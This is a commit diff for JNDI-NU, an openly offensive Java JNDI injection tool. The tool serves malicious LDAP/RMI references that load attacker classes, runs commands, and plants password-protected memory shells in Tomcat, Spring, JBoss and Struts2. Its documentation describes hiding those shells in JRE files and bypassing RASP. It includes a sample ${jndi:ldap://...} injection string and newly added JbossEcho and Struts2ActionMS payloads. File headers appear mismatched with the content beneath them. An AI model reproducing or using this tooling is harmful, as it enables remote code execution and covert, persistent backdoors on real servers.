提交项目

Author: Nuxm

.idea/compiler.xml

@@ -17,7 +17,7 @@ Usage: java -jar JNDI-NU.jar [options]
 ```
 
 * 目前支持的所有 ```PayloadType``` 为
-    * ```Bypass```: 用于rmi本地工程类加载，通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
+    * ```Bypass```: 用于rmi本地工厂类加载，通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
     * ```TomcatEcho```: 用于在中间件为 ```Tomcat``` 时命令执行结果的回显，通过添加自定义```header``` ```nu1r: whoami```的方式传递想要执行的命令
     * ```SpringEcho```: 用于在框架为 ```SpringMVC/SpringBoot``` 时命令执行结果的回显，通过添加自定义```header``` ```nu1r: whoami``` 的方式传递想要执行的命令
     * ```nu1r```：用于执行命令，如果命令有特殊字符，支持对命令进行 Base64编码后传输
@@ -61,7 +61,7 @@ Usage: java -jar JNDI-NU.jar [options]
 - u：内存马绑定的路径,default [/version.txt]
 - pw：内存马的密码,default [p@ssw0rd]
 - r：内存马 Referer check,default [https://nu1r.cn/]
-- h：通过将文件写入$JAVA_HOME来隐藏内存shell，目前只支持SpringControllerMS
+- h：通过将文件写入$JAVA_HOME来隐藏内存shell，目前只支持 SpringControllerMS
 - ht：隐藏内存外壳，输入1:write /jre/lib/charsets.jar 2:write /jre/classes/
 
 示例
@@ -91,6 +91,7 @@ Usage: java -jar JNDI-NU.jar [options]
 * ```WSFilter```: `CMD` 命令回显 WebSocket 内存马，`cmd命令回显`
 * ```TomcatExecutor``` : Executor 内存马，`cmd命令回显`
 * ```TomcatUpgrade```: TomcatUpgrade 内存马，`cmd命令回显`
+* ```Struts2ActionMS```: Action 类型内存马
 
 ---
 
@@ -269,12 +270,6 @@ WF ：Write File - 通过 FileOutputStream.write() 来写入文件，使用命
 
 - a：恶意类是否继承 AbstractTranslet
 - o：使用反射绕过
-- dt：使用脏数据绕过WAF，类型:1:Random Hashable Collections/2:LinkedList nested /3:TC_RESET in Serialized data
-- dl：使用类型1或3时脏数据的长度/使用类型2时嵌套循环的计数
-  - 使用dt与dl指定混淆的方式： `dt` 指定混淆类型，默认为1， `dl` 指定脏数据大小，默认为5000
-  - 当dt值为1时，随机使用 ArrayList/LinkedList/HashMap/LinkedHashMap/TreeMap 等集合类型来封装 object
-  - 当dt值为2时，使用循环嵌套 LinkedList 来封装 object
-  - 当dt值为3时，在 TC_RESET 中加入脏数据
 ~~- j：使用 ObjectInputStream/ObjectOutputStream 来构造序列化流~~（这个构造的流有BUG，还在思考修复）
 
 * 使用示例：
@@ -419,7 +414,7 @@ BC ：BCEL Classloader - 通过 ..bcel...ClassLoader.loadClass().newInstance() 
 ```
 {{url
   (${jndi:ldap://0.0.0.0:1389/Deserialization/CommonsCollections3/nu1r/Base64/{{base64
-      (LF#/tmp/evil.class-org.su18.Evil)
+      (LF#/tmp/evil.class-org)
   }}})
 }}
 ```

README.md

@@ -35,8 +35,7 @@ public static void start() throws IOException {
             @Override
             public void handle(HttpExchange httpExchange) {
                 try {
-                    System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [LDAP] " + "@|BG_green -----------------------------------------------------------------------------------------------------|@"));
-                    System.out.println(ansi().render("@|green [+]|@ @|MAGENTA New HTTP Request From >> |@" + httpExchange.getRemoteAddress() + "  " + httpExchange.getRequestURI()));
+                    System.out.println(ansi().render("@|green [+]|@ New HTTP Request From >>" + httpExchange.getRemoteAddress() + "  " + httpExchange.getRequestURI()));
 
                     String path = httpExchange.getRequestURI().getPath();
                     if (path.endsWith(".class")) {
@@ -68,7 +67,7 @@ public void handle(HttpExchange httpExchange) {
 
         httpServer.setExecutor(null);
         httpServer.start();
-        System.out.println(ansi().render("@|green [+]|@ @|MAGENTA HTTP Server Start Listening on >> |@" + Config.httpPort + "..."));
+        System.out.println(ansi().render("@|green [+]|@ HTTP Server Start Listening on >>" + Config.httpPort + "..."));
     }
 
     private static void handleFileRequest(HttpExchange exchange) throws Exception {

src/main/java/com/nu1r/jndi/HTTPServer.java

@@ -41,7 +41,7 @@ public static void start() {
             serverConfig.addInMemoryOperationInterceptor(new LdapServer());
             InMemoryDirectoryServer ds = new InMemoryDirectoryServer(serverConfig);
             ds.startListening();
-            System.out.println(ansi().render("@|green [+]|@ @|MAGENTA LDAP Server Start Listening on >>|@ " + Config.ldapPort + "..."));
+            System.out.println(ansi().render("@|green [+]|@ LDAP Server Start Listening on >>" + Config.ldapPort + "..."));
         } catch (Exception e) {
             e.printStackTrace();
         }
@@ -80,8 +80,7 @@ public void processSearchResult(InMemoryInterceptedSearchResult result) {
 
         //收到ldap请求
         System.out.println("\n");
-        System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [LDAP] " + "@|BG_green -----------------------------------------------------------------------------------------------------|@"));
-        System.out.println(ansi().render("@|green [+]|@ @|MAGENTA Received LDAP Query >>|@ " + base));
+        System.out.println(ansi().render("@|green [+]|@ Received LDAP Query >> " + base));
         LdapController controller = null;
         //find controller
         //根据请求的路径从route中匹配相应的controller

src/main/java/com/nu1r/jndi/LdapServer.java

@@ -92,7 +92,7 @@ public static void start() {
         String url = "http://" + Config.ip + ":" + Config.rmiPort;
 
         try {
-            System.out.println(ansi().render("@|green [+]|@ @|MAGENTA RMI  Server Start Listening on >> |@" + Config.rmiPort + "..."));
+            System.out.println(ansi().render("@|green [+]|@RMI  Server Start Listening on >>" + Config.rmiPort + "..."));
             RMIServer c = new RMIServer(Config.rmiPort, new URL(url));
             c.run();
         } catch (Exception e) {
@@ -258,8 +258,7 @@ private boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Ex
         }
 
         String object = (String) ois.readObject();
-        System.out.println(ansi().render("@|green [+]|@" + " [" + Ltime.getLocalTime() + "]" + " [RMI] " + "@|BG_green -----------------------------------------------------------------------------------------------------|@"));
-        System.out.println(ansi().render("@|green [+]|@ @|MAGENTA RMI  服务器  >> RMI 查询 |@" + object + " " + method));
+        System.out.println(ansi().render("@|green [+]|@RMI  服务器  >> RMI 查询" + object + " " + method));
         out.writeByte(TransportConstants.Return); // transport op
         try (ObjectOutputStream oos = new MarshalOutputStream(out, this.classpathUrl)) {
 
@@ -270,10 +269,10 @@ private boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Ex
             ReferenceWrapper rw = Reflections.createWithoutConstructor(ReferenceWrapper.class);
 
             if (object.startsWith("Bypass")) {
-                System.out.println(ansi().render("@|green [+]|@ @|MAGENTA RMI  服务器  >> 发送本地类加载引用|@"));
+                System.out.println(ansi().render("@|green [+]|@RMI  服务器  >> 发送本地类加载引用"));
                 Reflections.setFieldValue(rw, "wrappee", execByEL());
             } else {
-                System.out.println(ansi().render("@|green [+]|@ @|MAGENTA RMI  服务器  >> 向目标发送 stub >>|@ %s", new URL(this.classpathUrl, this.classpathUrl.getRef().replace('.', '/').concat(".class"))));
+                System.out.println(ansi().render("@|green [+]|@RMI  服务器  >> 向目标发送 stub >> %s", new URL(this.classpathUrl, this.classpathUrl.getRef().replace('.', '/').concat(".class"))));
                 Reflections.setFieldValue(rw, "wrappee", new Reference("Foo", this.classpathUrl.getRef(), this.classpathUrl.toString()));
             }
 

src/main/java/com/nu1r/jndi/RMIServer.java

@@ -12,12 +12,14 @@
 import com.nu1r.jndi.template.Websphere.WebsphereMemshellTemplate;
 import com.nu1r.jndi.template.jboss.JBFMSFromContextF;
 import com.nu1r.jndi.template.jboss.JBSMSFromContextS;
+import com.nu1r.jndi.template.jboss.JbossEcho;
 import com.nu1r.jndi.template.jetty.JFMSFromJMXF;
 import com.nu1r.jndi.template.jetty.JSMSFromJMXS;
 import com.nu1r.jndi.template.resin.RFMSFromThreadF;
 import com.nu1r.jndi.template.resin.RSMSFromThreadS;
 import com.nu1r.jndi.template.spring.SpringControllerMS;
 import com.nu1r.jndi.template.spring.SpringInterceptorMS;
+import com.nu1r.jndi.template.struts2.Struts2ActionMS;
 import com.nu1r.jndi.template.tomcat.*;
 import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
 import com.unboundid.ldap.sdk.Entry;
@@ -49,7 +51,7 @@ public class BasicController implements LdapController {
     @Override
     public void sendResult(InMemoryInterceptedSearchResult result, String base) throws Exception {
         try {
-            System.out.println(ansi().render("@|green [+]|@ @|MAGENTA Sending LDAP ResourceRef result for |@" + base + " @|MAGENTA with basic remote reference payload|@"));
+            System.out.println(ansi().render("@|green [+]|@Sending LDAP ResourceRef result for" + base + " with basic remote reference payload"));
             Entry     e         = new Entry(base);
             String    className = "";
             CtClass   ctClass;
@@ -143,8 +145,8 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
                                 newClass.makeClassInitializer().insertBefore(className);
 
                                 if (IS_INHERIT_ABSTRACT_TRANSLET) {
-                                    Class abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
-                                    CtClass superClass = pool.get(abstTranslet.getName());
+                                    Class   abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
+                                    CtClass superClass   = pool.get(abstTranslet.getName());
                                     newClass.setSuperclass(superClass);
                                 }
 
@@ -187,8 +189,8 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
                                 newClass.makeClassInitializer().insertBefore(className);
 
                                 if (IS_INHERIT_ABSTRACT_TRANSLET) {
-                                    Class abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
-                                    CtClass superClass = pool.get(abstTranslet.getName());
+                                    Class   abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
+                                    CtClass superClass   = pool.get(abstTranslet.getName());
                                     newClass.setSuperclass(superClass);
                                 }
 
@@ -198,8 +200,8 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
                         }
                     }
                     if (IS_INHERIT_ABSTRACT_TRANSLET) {
-                        Class abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
-                        CtClass superClass = pool.get(abstTranslet.getName());
+                        Class   abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
+                        CtClass superClass   = pool.get(abstTranslet.getName());
                         ctClass.setSuperclass(superClass);
                     }
                     className = ctClass.getName();
@@ -242,8 +244,8 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
                                 newClass.makeClassInitializer().insertBefore(className);
 
                                 if (IS_INHERIT_ABSTRACT_TRANSLET) {
-                                    Class abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
-                                    CtClass superClass = pool.get(abstTranslet.getName());
+                                    Class   abstTranslet = Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet");
+                                    CtClass superClass   = pool.get(abstTranslet.getName());
                                     newClass.setSuperclass(superClass);
                                 }
 
@@ -255,10 +257,13 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
                     className = ctClass.getName();
                     ctClass.writeFile();
                     break;
+                case jbossecho:
+                    className = JbossEcho.class.getName();
+                    break;
             }
 
             URL turl = new URL(new URL(this.codebase), className + ".class");
-            System.out.println(ansi().render("@|green [+]|@ @|MAGENTA Send LDAP reference result for |@" + base + " @|MAGENTA redirecting to |@" + turl));
+            System.out.println(ansi().render("@|green [+]|@ Send LDAP reference result for " + base + " redirecting to" + turl));
             e.addAttribute("javaClassName", "foo");
             e.addAttribute("javaCodeBase", this.codebase);
             e.addAttribute("objectClass", "javaNamingReference"); //$NON-NLS-1$
@@ -276,7 +281,7 @@ public void sendResult(InMemoryInterceptedSearchResult result, String base) thro
     }
 
     public static void main(String[] args) {
-        System.out.println(ansi().fgRgb(188,232,105).render(" Windows下使用Agent写入"));
+        System.out.println(ansi().fgRgb(188, 232, 105).render(" Windows下使用Agent写入"));
     }
 
     @Override
@@ -288,7 +293,7 @@ public void process(String base) throws UnSupportedPayloadTypeException, Incorre
 
             try {
                 payloadType = PayloadType.valueOf(base.substring(fistIndex + 1, secondIndex).toLowerCase());
-                System.out.println(ansi().render("@|green [+]|@ @|MAGENTA PaylaodType >> |@" + payloadType));
+                System.out.println(ansi().render("@|green [+]|@PaylaodType >> " + payloadType));
             } catch (IllegalArgumentException e) {
                 throw new UnSupportedPayloadTypeException("UnSupportedPayloadType >> " + base.substring(fistIndex + 1, secondIndex));
             }
@@ -333,17 +338,17 @@ public void process(String base) throws UnSupportedPayloadTypeException, Incorre
 
                 if (cmdLine.hasOption("winAgent")) {
                     winAgent = true;
-                    System.out.println(ansi().fgRgb(188,232,105).render("[+] Windows下使用Agent写入"));
+                    System.out.println(ansi().fgRgb(188, 232, 105).render("[+] Windows下使用Agent写入"));
                 }
 
                 if (cmdLine.hasOption("linAgent")) {
                     winAgent = true;
-                    System.out.println(ansi().fgRgb(188,232,105).render("[+] Linux下使用Agent写入"));
+                    System.out.println(ansi().fgRgb(188, 232, 105).render("[+] Linux下使用Agent写入"));
                 }
 
                 if (cmdLine.hasOption("obscure")) {
                     IS_OBSCURE = true;
-                    System.out.println(ansi().fgRgb(188,232,105).render("[+] 使用反射绕过RASP"));
+                    System.out.println(ansi().fgRgb(188, 232, 105).render("[+] 使用反射绕过RASP"));
                 }
 
                 if (cmdLine.hasOption("url")) {
@@ -361,8 +366,8 @@ public void process(String base) throws UnSupportedPayloadTypeException, Incorre
                 }
 
                 if (cmdLine.hasOption("referer")) {
-                    REFERER = cmdLine.getOptionValue("referer");
-                    System.out.println("[+] referer：" + REFERER);
+                    HEADER_KEY = cmdLine.getOptionValue("referer");
+                    System.out.println("[+] referer：" + HEADER_KEY);
                 }
 
                 if (cmdLine.hasOption("AbstractTranslet")) {
@@ -381,7 +386,7 @@ public void process(String base) throws UnSupportedPayloadTypeException, Incorre
 
             if (gadgetType == GadgetType.base64) {
                 String cmd = Util.getCmdFromBase(base);
-                System.out.println(ansi().render("@|green [+]|@ @|MAGENTA Command >> |@" + cmd));
+                System.out.println(ansi().render("@|green [+]|@ Command >> " + cmd));
                 params = new String[]{cmd};
             }
         } catch (Exception e) {